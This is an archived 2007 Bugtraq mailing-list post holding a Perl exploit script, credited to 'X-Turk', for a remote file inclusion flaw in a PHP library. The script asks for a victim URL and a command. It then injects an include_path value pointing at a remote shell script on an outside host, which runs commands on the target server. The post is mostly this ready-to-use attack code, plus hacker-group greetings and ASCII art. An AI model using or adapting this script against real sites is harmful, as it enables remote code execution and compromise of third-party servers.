lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 29 Jan 2007 19:04:13 -0000
From: umutc4n@...mail.com
To: bugtraq@...urityfocus.com
Subject: PhP Generic library & framework (include_path) Remote File
 Include Exploit

#[ Exp coding : X-Turk] 
#[ web app : PhP Generic library & framework (include_path) Remote File Include Exploit ]
#[ My Site : Worldhackerz.net ]
#[ Thanx : Madconfig , H0tturk , Pala , Darkworm , Batty , Akrep , Str0ke , And Al Worldhackerz.net Team Users ]
#                                                ________######________________
#                                                ______##########______________
#                                                _____#############____________
#                                                ____##############____________
#                                                ___#######______###___________
#                                                ___######________##__##_______
#                                                ___######____________###______
#                                                ___#####_____________######___
#                                                ___#####____________#######___
#                                                ___#####___________#######____
#                                                ___#####____________######____
#                                                ___#####_____________######___
#                                                ___######____________###_##___
#                                                ____######_______#___##_______
#                                                ____#######____###____________
#                                                _____############_____________
#                                                ______##########______________
#                                                ________######________________
#
# 
#
$rfi = "membres/membreManager.php?include_path="; 
$path = "/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) X-Turk\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan X-Turk\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac.k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) X-Turk - Worldhackerz.net\n$thx: Madconfig\n";
sleep 3;
system("start $acacaz");
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ